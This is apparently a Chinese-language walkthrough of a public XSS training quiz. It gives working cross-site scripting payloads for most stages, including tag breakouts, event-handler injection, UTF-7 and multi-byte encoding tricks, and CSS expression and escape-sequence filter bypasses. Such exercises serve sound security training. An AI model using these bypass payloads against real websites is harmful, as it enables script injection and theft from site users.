http://xss-quiz.int21h.jp/
Notes (for all stages):
* NEVER DO ANY ATTACKS EXCEPT XSS.
* DO NOT USE ANY AUTOMATED SCANNER (AppScan, WebInspect, WVS, ...)
* Some stages may fit only IE.
Stage #1:
地址: http://xss-quiz.int21h.jp/?sid=7b2ec32a44f5676dbc2ad38d82708b4e48d596df
提示: very simple...
方案: Xssss"</b><script>alert(document.domain);</script><b>"Xssss
Stage #2:
地址: http://xss-quiz.int21h.jp/stage2.php?sid=4998593ac8245a1e877a2c16905603858fa94e8f
提示: close the current tag and add SCRIPT tag...
方案: Xssss"><script>alert(document.domain);</script><br id="x
Stage #3: 其他可用提交项
地址: http://xss-quiz.int21h.jp/stage-3.php?sid=02f61eab83fab43d957ebf83139f53584a5f65b8
提示: The input in text box is properly escaped.
方案: p2=Japan<script>alert(document.domain);</script>
Stage #4: 隐藏的表单项
地址: http://xss-quiz.int21h.jp/stage_4.php?sid=e6cc736448dbe244a28fb221afde842150c404f4
提示: invisible input field
方案: p3=hackme"><script>alert(document.domain);</script><br id="x
Stage #5: 输入框长度被限制
地址: http://xss-quiz.int21h.jp/stage--5.php?sid=25dff63827e73b082b8d196a13a0ed3a6d7fb7dc
提示: length limited text box
方案: p1=Xssss%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2fscript%3E%3Cb%20id%3D%22x
Stage #6: <,> 被转换为< >
地址: http://xss-quiz.int21h.jp/stage-no6.php?sid=d37bbdc69d77bd8b10ec200e24dd6f0450b4cc53
提示: event handler attributes
方案: Xssss" οnfοcus=javascript:alert(document.domain); id="x
Stage #7: 添加元素属性
地址: http://xss-quiz.int21h.jp/stage07.php?sid=7abf224a51a26fd9b765e5f5a4f625636f978ef1
提示: nearly the same... but a bit more tricky.
方案: Xssss οnfοcus=javascript:alert(document.domain)
Stage #8: 利用href
地址: http://xss-quiz.int21h.jp/stage008.php?sid=3d0bb2a2691110ff2fb7d43162d99e9d0e8b6c45
提示: the 'javascript' scheme.
方案: javascript:alert(document.domain);
Stage #9: UTF-7 -- IE7测试成功(php -- mb_convert_encoding($string, 'UTF-7'))
地址: http://xss-quiz.int21h.jp/stage_09.php?sid=902024280ebc04bfbeca57f2e54e75a482c14e12
提示:
方案: p1=Xssss%2BACI++onmouseover%2BAD0AIg-javascript%3Aalert%28document.domain%29%2BACI++id%2BAD0AIg-x&charset=UTF-7
Stage #10: 字符串domain被过滤
地址: http://xss-quiz.int21h.jp/stage00010.php?sid=1d55eee5a44ab3d875549671b0d7fdd53d8c05e1
提示: UTF-7 XSS
方案: p1=Xssss%22%3E%3Cscript%3Ealert%28document.ddomainomain%29%3B%3C%2Fscript%3E%3Cbr+%2F
Stage #11: 过滤-标签/方法
地址: http://xss-quiz.int21h.jp/stage11th.php?sid=af010211680adb334c35671f3d146723df66e8ec
提示: "s/script/xscript/ig;" and "s/on[a-z]+=/onxxx=/ig;" and "s/style=/stxxx=/ig;"
方案: p1=Xssss"><a href="javascript:alert(document.domain);">Xssss</a><br id="x
Stage #12: ie
地址: http://xss-quiz.int21h.jp/stage_no012.php?sid=5e25fb0f407625837c9810f58c66673c52df60e0
提示: "s/[\x00-\x20\<\>\"\']//g;"
方案: ``οnfοcus=alert(document.domain)
Stage #13: STYLE
地址: http://xss-quiz.int21h.jp/stage13_0.php?sid=9b00913b1a60ca6344c1f26a6d352af3d7ee4c72
提示: style attribute
方案: background-color:salmon;input:expression(javascript:alert(document.domain)) IE循环弹框
方案: background-color:salmon;input:expression((window.x==1)?'':(window.x=1,alert(document.domain)))
Stage #14: STYLE 注释符
地址: http://xss-quiz.int21h.jp/stage-_-14.php?sid=a629a8aaa2a217f28046edb7722a9083f4612419
提示: s/(url|script|eval|expression)/xxx/ig;
方案: background-color:salmon;input:e/**/xpression((window.x==1)?'':(window.x=1,alert(document.domain)))
Stage #15: 过滤--转码
地址: http://xss-quiz.int21h.jp/stage__15.php?sid=0480521f1f39f182becacfbedf36210ca0140fe5
提示: document.write();
方案: hogehoge\\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e
Stage #16: 过滤--转码
地址: http://xss-quiz.int21h.jp/stage00000016.php?sid=9c7972a074c9caf57100746acaab2864cd2dff2e
提示: "document.write();" and "s/\\x/\\\\x/ig;"
方案: hogehoge\\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e
Stage #17:
地址: http://xss-quiz.int21h.jp/stage-No17.php?sid=53f40e41f2c7a0eef557e1f469e312e02aa0ddba
提示: multi-byte character
方案: p1=1%A7&p2=+onmouseover%3Dalert%28document.domain%29%3B+%A7
Stage #18:
地址: http://xss-quiz.int21h.jp/stage__No18.php?sid=66431e719a0b192f11d5c86252382c114ad7dda3
提示: us-ascii high bit issue
Stage #19:
地址: http://xss-quiz.int21h.jp/stage_--19.php?sid=e32c8f9cd60f79786b67defb896fad8a7c7f461a
提示: Twitter DomXss at Sep 24, 2010
+++++++++++++++++++++++++++++++++++++++++++++++++++++++
其他过关方案:
http://blogs.tunelko.com/2013/12/02/xss-challenges/
http://blog.knownsec.com/Knownsec_RD_Checklist/xss/xss_quiz.txt
推荐:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet